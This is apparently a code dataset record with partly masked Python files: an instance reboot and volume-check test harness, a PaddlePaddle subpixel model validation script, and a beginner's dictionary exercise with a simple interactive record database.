== serial_number:\n return disk\n return None\n\n\n\n def is_volume_attached_to_this_instance(self, volume):\n '''\n Attempts to look up volume state per cloud to confirm the cloud believe the state of this volume is attached\n to this instance. 
This does not verify the guest/hypervisor also belives the volume is attached.\n :param volume: volume obj.\n :returns boolean\n '''\n volume.update()\n if hasattr(volume, 'attach_data') and volume.attach_data and (volume.attach_data.instance_id == self.id):\n self.debug('Volume:' + str(volume.id) + \" is attached to this instance: \" + str(self.id) + \" per cloud perspective\")\n return True\n else:\n self.debug('Volume:' + str(volume.id) + \" is NOT attached to this instance: \" + str(self.id) + \" per cloud perspective\")\n return False\n\n\n\n def update_volume_guest_info(self, volume, md5=None, md5len=None, guestdev=None):\n self.debug(\"{0} update_volume_guest_info: {1} {2}\"\n .format(termline, volume, termline))\n if not self.is_volume_attached_to_this_instance(volume):\n raise Exception('Volume not attached to this instance')\n disk = None\n if not self.get_volume_from_attached_list_by_id(volume.id):\n self.attached_vols.append(volume)\n volume.guestdev = guestdev or volume.guestdev\n if md5:\n if not md5len:\n raise Exception('Must provide md5len if providing the md5')\n volume.md5 = md5\n volume.md5len = md5len\n else:\n disk = self.get_diskdrive_for_volume(volume)\n if not disk:\n raise Exception('Could not find diskdrive for volume when attempting to update volume guest info:' + str(volume))\n volume.md5len = md5len or 1024\n volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)\n if not guestdev:\n volume.guestdev = disk.deviceid\n disk = disk or self.get_diskdrive_for_volume(volume)\n disk.update_ebs_info()\n volume.update_volume_attach_info_tags(md5=volume.md5, md5len=volume.md5len, instance_id=self.id, guestdev=volume.guestdev)\n return volume\n\n def get_unsynced_volumes(self, check_md5=True):\n '''\n Description: Returns list of volumes which are:\n -in a state the cloud believes the vol is no longer attached\n -the attached device has changed, or is not found.\n If all euvols are shown as attached to this instance, and the last known local dev is present and/or a local device is found with matching md5 checksum\n then the list will return 'None' as all volumes are successfully attached and state is in sync.\n By default this method will iterate through all the known euvolumes attached to this euinstance.\n A subset can be provided in the list argument 'euvol_list'.\n Returns a list of euvolumes for which a corresponding guest device could not be found, or the cloud no longer believes is attached.\n\n :param euvol_list: - optional - euvolume object list. Defaults to all self.attached_vols\n :param md5length: - optional - defaults to the length given in each euvolume. Used to calc md5 checksum of devices\n :param timerpervolume: -optional - time to wait for device to appear, per volume before failing\n :param min_polls: - optional - minimum iterations to check guest devs before failing, despite timeout\n :param check_md5: - optional - find devices by md5 comparision. Default is to only perform this check when virtio_blk is in use.\n '''\n bad_list = []\n retdict = self.sync_attached_volumes_with_clouds_view()\n bad_list.extend(retdict['badvols'])\n return bad_list\n\n\n\n def reboot_instance_and_verify(self,\n waitconnect=60,\n timeout=600,\n wait_for_ports=180,\n connect=True,\n checkvolstatus=False,\n pad=5,\n uptime_retries=3):\n '''\n Attempts to reboot an instance and verify it's state post reboot.\n waitconnect-optional-integer representing seconds to wait before attempting to connect to instance after reboot\n timeout-optional-integer, seconds. 
If a connection has failed, this timer is used to determine a retry\n connect- optional - boolean to indicate whether an ssh session should be established once the expected state has been reached\n checkvolstatus - optional -boolean to be used to check volume status post start up\n '''\n msg=\"\"\n newuptime = None\n attempt = 0\n def get_safe_uptime():\n uptime = None\n try:\n uptime = self.get_uptime()\n except: pass\n return uptime\n self.debug('Attempting to reboot instance:'+str(self.id)+', check attached volume state first')\n uptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)\n elapsed = 0\n start = time.time()\n if checkvolstatus:\n #update the md5sums per volume before reboot\n bad_vols=self.get_unsynced_volumes()\n if bad_vols != []:\n for bv in bad_vols:\n self.debug(str(self.id)+'Unsynced volume found:'+str(bv.id))\n raise Exception(str(self.id)+\"Could not reboot using checkvolstatus flag due to unsync'd volumes\")\n self.debug('Rebooting now...')\n self.reboot()\n time.sleep(waitconnect)\n try:\n self.poll_for_ports_status(ports=[3389,5589], timeout=wait_for_ports)\n except:\n self.debug('Failed to poll winrm and rdp ports after ' + str(wait_for_ports) + ' seconds, try to connect anyways...')\n timeout=timeout - int(time.time()-start)\n while (elapsed < timeout):\n self.connect_to_instance(timeout=timeout)\n #Wait for the system to provide a valid response for uptime, early connections may not\n newuptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)\n elapsed = int(time.time()-start)\n #Check to see if new uptime is at least 'pad' less than before, allowing for some pad\n if (newuptime - (uptime+elapsed)) > pad:\n err_msg = \"Instance uptime does not represent a reboot. Orig:\"+str(uptime)+\\\n \", New:\"+str(newuptime)+\", elapsed:\"+str(elapsed)+\"/\"+str(timeout)\n if elapsed > timeout:\n raise Exception(err_msg)\n else:\n self.debug(err_msg)\n else:\n self.debug(\"Instance uptime indicates a reboot. 
Orig:\"+str(uptime)+\\\n \", New:\"+str(newuptime)+\", elapsed:\"+str(elapsed))\n break\n if checkvolstatus:\n badvols= self.get_unsynced_volumes()\n if badvols != []:\n for vol in badvols:\n msg = msg+\"\\nVolume:\"+vol.id+\" Local Dev:\"+vol.guestdev\n raise Exception(\"Missing volumes post reboot:\"+str(msg)+\"\\n\")\n self.debug(self.id+\" reboot_instance_and_verify Success\")\n\n\n def get_uptime(self):\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n if hasattr(self.system_info, 'system_boot_time'):\n return self._get_uptime_from_system_boot_time()\n elif hasattr(self.system_info, 'system_up_time'):\n return self._get_uptime_from_system_up_time()\n else:\n tb = self.tester.get_traceback()\n raise Exception(str(tb) + '\\nCould not get system boot or up time from system_info')\n\n def _get_uptime_from_system_boot_time(self):\n #11/18/2013, 3:15:39 PM\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n splitdate = self.system_info.system_boot_time.split()\n datestring = splitdate[0]\n timestring = splitdate[1]\n ampm = splitdate[2]\n month, day, year = datestring.replace(',',\"\").split('/')\n hours, minutes, seconds = timestring.split(':')\n if ampm == 'PM':\n hours = int(hours) + 12\n datetimestring = str(year) + \" \" + \\\n str(month) + \" \" + \\\n str(day) + \" \" + \\\n str(hours) + \" \" + \\\n str(minutes) + \" \" + \\\n str(seconds)\n dt = datetime.strptime(datetimestring, \"%Y %m %d %H %M %S\")\n return int(time.time() - time.mktime(dt.timetuple()))\n \n def _get_uptime_from_system_up_time(self):\n #0 Days, 0 Hours, 6 Minutes, 39 Seconds\n if not hasattr(self, 'system_info'):\n self.update_system_info()\n uptime_string = self.system_info.system_up_time\n days = 0\n hours = 0\n minutes = 0\n seconds = 0\n split = uptime_string.split(',')\n for part in split:\n time_string = \"\"\n if re.search('Days', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n days = int(time_string or 0)\n elif re.search('Hours', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n hours = int(time_string or 0)\n elif re.search('Minutes', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n minutes = int(time_string or 0)\n elif re.search('Seconds', part, re.IGNORECASE):\n time_string = str(part.split()[0]).strip()\n seconds = int(time_string or 0)\n self.debug(\"Days:\" +str(days)+', Hours:'+ str(hours) + \", Minutes:\" + str(minutes) + \", Seconds:\" + str(seconds))\n uptime = (days * 86400) + (hours * 3600) + (minutes * 60) + seconds\n return uptime\n\n\n def stop_instance_and_verify(self, timeout=200, state='stopped',\n failstate='terminated', check_vols=True):\n '''\n Attempts to stop instance and verify the state has gone to\n stopped state\n :param timeout; -optional-time to wait on instance to go to state 'state' before failing\n :param state: -optional-the expected state to signify success, default is stopped\n :param failstate: -optional-a state transition that indicates failure, default is terminated\n '''\n self.debug(self.id+\" Attempting to stop instance...\")\n start = time.time()\n elapsed = 0\n self.stop()\n while (elapsed < timeout):\n time.sleep(2)\n self.update()\n if self.state == state:\n break\n if self.state == failstate:\n raise Exception(str(self.id) + \" instance went to state:\" +\n str(self.state) + \" while stopping\")\n elapsed = int(time.time()- start)\n if elapsed % 10 == 0 :\n self.debug(str(self.id) + \" wait for stop, in state:\" +\n str(self.state) + \",time remaining:\" +\n 
str(elapsed) + \"/\" + str(timeout) )\n if self.state != state:\n raise Exception(self.id + \" state: \" + str(self.state) +\n \" expected:\" + str(state) +\n \", after elapsed:\" + str(elapsed))\n if check_vols:\n for volume in self.attached_vols:\n volume.update\n if volume.status != 'in-use':\n raise Exception(str(self.id) + ', Volume ' +\n str(volume.id) + ':' + str(volume.status)\n + ' state did not remain in-use '\n 'during stop')\n self.debug(self.id + \" stop_instance_and_verify Success\")\n\n\n def start_instance_and_verify(self, timeout=300, state = 'running',\n failstates=['terminated'], failfasttime=30,\n connect=True, checkvolstatus=True):\n '''\n Attempts to start instance and verify state, and reconnects ssh session\n :param timeout: -optional-time to wait on instance to go to state\n 'state' before failing\n :param state: -optional-the expected state to signify success,\n default is running\n :param failstate: -optional-a state transition that indicates failure,\n default is terminated\n :param connect: -optional - boolean to indicate whether an ssh\n session should be established once the expected state\n has been reached\n :param checkvolstatus: -optional -boolean to be used to check volume\n status post start up\n '''\n self.debug(self.id+\" Attempting to start instance...\")\n if checkvolstatus:\n for volume in self.attached_vols:\n volume.update\n if checkvolstatus:\n if volume.status != 'in-use':\n raise Exception(str(self.id) + ', Volume ' + str(volume.id) + ':' + str(volume.status)\n + ' state did not remain in-use during stop' )\n self.debug(\"\\n\"+ str(self.id) + \": Printing Instance 'attached_vol' list:\\n\")\n self.tester.show_volumes(self.attached_vols)\n msg=\"\"\n start = time.time()\n elapsed = 0\n self.update()\n #Add fail fast states...\n if self.state == 'stopped':\n failstates.extend(['stopped','stopping'])\n self.start()\n\n while (elapsed < timeout):\n elapsed = int(time.time()- start)\n self.update()\n self.debug(str(self.id) + \" wait for start, in state:\" +\n str(self.state) + \",time remaining:\" + str(elapsed) +\n \"/\"+str(timeout) )\n if self.state == state:\n break\n if elapsed >= failfasttime:\n for failstate in failstates:\n if self.state == failstate:\n raise Exception(str(self.id) +\n \" instance went to state:\" +\n str(self.state) + \" while starting\")\n time.sleep(10)\n if self.state != state:\n raise Exception(self.id + \" not in \" + str(state) +\n \" state after elapsed:\" + str(elapsed))\n else:\n self.debug(self.id + \" went to state:\" + str(state))\n if connect:\n self.connect_to_instance(timeout=timeout)\n if checkvolstatus:\n badvols= self.get_unsynced_volumes(check_md5=True)\n if badvols != []:\n for vol in badvols:\n msg = msg + \"\\nVolume:\" + vol.id + \" Local Dev:\" +\\\n vol.guestdev\n raise Exception(\"Missing volumes post reboot:\" + str(msg) +\n \"\\n\")\n self.debug(self.id+\" start_instance_and_verify Success\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
<|reserved_special_token_0|>
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).
requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points,
dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s', self.
weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device), img.to(self.
device), patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).
requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points,
dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
<|reserved_special_token_1|>
"""script for subpixel experiment (not tested)
"""
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
        logging.info('successfully loaded pretrained model from: %s',
                     self.weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device),
img.to(self.device),
patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
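# Quick smoke test: load a few HPatches samples and run the subpixel net on patches extracted around sample points.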
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
test_set, test_loader = data['test_set'], data['test_loader']
for i, sample in tqdm(enumerate(test_loader)):
if i > 1:
break
val_agent = Val_model_subpixel(config['subpixel'], device=device)
val_agent.loadModel()
img = sample['image']
print('image: ', img.shape)
points = paddle.to_tensor([[1, 2], [3, 4]])
def points_to_4d(points):
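            # Prepend two zero columns so each 2-D point becomes a 4-D index (zeros presumably acting as batch/channel indices).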
num_of_points = points.shape[0]
cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)
points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)
return points
label_idx = points_to_4d(points)
patches = val_agent.extract_patches(label_idx, img)
points_res = val_agent.run(patches)
|
flexible
|
{
"blob_id": "fc89fdf17f887ea398be5b36d4d6f0444d64b3e0",
"index": 8026,
"step-1": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n <mask token>\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n paddle.set_default_dtype('float32')\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n task = config['data']['dataset']\n from utils.loader import dataLoader_test as dataLoader\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).\n requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points,\n dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\nfrom pathlib import Path\nimport paddle\nimport paddle.optimizer\nimport paddle.io\nfrom utils.loader import dataLoader\nfrom utils.loader import modelLoader\nfrom utils.loader import pretrainedLoader\nfrom utils.tools import dict_update\nfrom utils.utils import labels2Dto3D\nfrom utils.utils import flattenDetection\nfrom utils.utils import labels2Dto3D_flattened\nfrom utils.utils import pltImshow\nfrom utils.utils import saveImg\nfrom utils.utils import precisionRecall_torch\nfrom utils.utils import save_checkpoint\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s', self.\n weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device), img.to(self.\n device), patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n paddle.set_default_dtype('float32')\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n task = config['data']['dataset']\n from utils.loader import dataLoader_test as dataLoader\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).\n requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points,\n dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-5": "\"\"\"script for subpixel experiment (not tested)\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\nfrom pathlib import Path\n\nimport paddle\nimport paddle.optimizer\nimport paddle.io\n\nfrom utils.loader import dataLoader\nfrom utils.loader import modelLoader\nfrom utils.loader import pretrainedLoader\nfrom utils.tools import dict_update\nfrom utils.utils import labels2Dto3D\nfrom utils.utils import flattenDetection\nfrom utils.utils import labels2Dto3D_flattened\nfrom utils.utils import pltImshow\nfrom utils.utils import saveImg\nfrom utils.utils import precisionRecall_torch\nfrom utils.utils import save_checkpoint\n\n\[email protected]_grad()\nclass Val_model_subpixel(object):\n\n def __init__(self, config, device='gpu', verbose=False):\n self.config = config\n self.model = self.config['name']\n self.params = self.config['params']\n self.weights_path = self.config['pretrained']\n self.device = device\n pass\n\n def loadModel(self):\n from utils.loader import modelLoader\n self.net = modelLoader(model=self.model, **self.params)\n\n checkpoint = paddle.load(self.weights_path)\n self.net.load_dict(checkpoint['model_state_dict'])\n\n self.net = self.net.to(self.device)\n logging.info('successfully load pretrained model from: %s',\n self.weights_path)\n pass\n\n def extract_patches(self, label_idx, img):\n from utils.losses import extract_patches\n patch_size = self.config['params']['patch_size']\n patches = extract_patches(label_idx.to(self.device),\n img.to(self.device),\n patch_size=patch_size)\n return patches\n pass\n\n def run(self, patches):\n with paddle.no_grad():\n pred_res = self.net(patches)\n return pred_res\n pass\n\n\nif __name__ == '__main__':\n filename = 'configs/magicpoint_repeatability.yaml'\n import yaml\n\n device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'\n device = device.replace('cuda', 'gpu')\n device = paddle.set_device(device)\n\n paddle.set_default_dtype('float32')\n\n with open(filename, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n task = config['data']['dataset']\n\n from utils.loader import dataLoader_test as dataLoader\n\n data = dataLoader(config, dataset='hpatches')\n test_set, test_loader = data['test_set'], data['test_loader']\n for i, sample in tqdm(enumerate(test_loader)):\n if i > 1:\n break\n\n val_agent = Val_model_subpixel(config['subpixel'], device=device)\n val_agent.loadModel()\n\n img = sample['image']\n print('image: ', img.shape)\n points = paddle.to_tensor([[1, 2], [3, 4]])\n\n def points_to_4d(points):\n num_of_points = points.shape[0]\n cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)\n points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)\n return points\n label_idx = points_to_4d(points)\n\n patches = val_agent.extract_patches(label_idx, img)\n points_res = val_agent.run(patches)\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# lesson 4 Mateush Vilen
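# Practice with dicts and lists: comprehensions, user input, exception handling, and a menu-driven mini database.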
my_information = {
'name': 'Vilen',
'last_name': 'Mateush',
'how_old': 31,
'born_town': 'Khmelniysky'
}
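# Dict comprehension: keys 0..6 mapped to their squares.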
dict_test = {key: key**2 for key in range(7)}
print('dict_test: ', dict_test)
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key to remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
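# Accessing a missing list index or dict key raises IndexError / KeyError; catch and handle both.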
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
# ------------My database------------:
work = True
user_dict = {}
user_numb = 0
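# Main menu loop: 1 = add, 2 = delete, 3 = change, 4 = exit.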
while work == True:
    print('Your personal database is working, this is your current data:')
print(user_dict)
    print('if you want to add a record press 1')
    print('if you want to delete a record press 2')
    print('if you want to change a record press 3')
    print('if you want to exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
        print('What number of record do you want to delete?')
        del_key = input()
        if del_key.isdigit() == False:
            print('This is not a correct number!')
            continue
        elif int(del_key) > len(user_dict) or int(del_key) <= 0:
            print('Your base does not have this number!')
            continue
        # map the 1-based record number onto the matching dict key before removing it
        user_dict.pop(list(user_dict.keys())[int(del_key) - 1])
elif int(user_numb) == 3:
        print('What number of record do you want to change?')
        reg_key = input()
        if reg_key.isdigit() == False:
            print('This is not a number!')
            continue
        elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
            print('Your base does not have this number!')
            continue
        print('write value for your key:')
        value = input()
        if value.isdigit() == True:
            value = int(value)
        # map the 1-based record number onto the matching dict key before updating it
        user_dict[list(user_dict.keys())[int(reg_key) - 1]] = value
elif int(user_numb) == 4:
work = False
else:
        print('Your input is not valid, please enter a valid number!')
|
normal
|
{
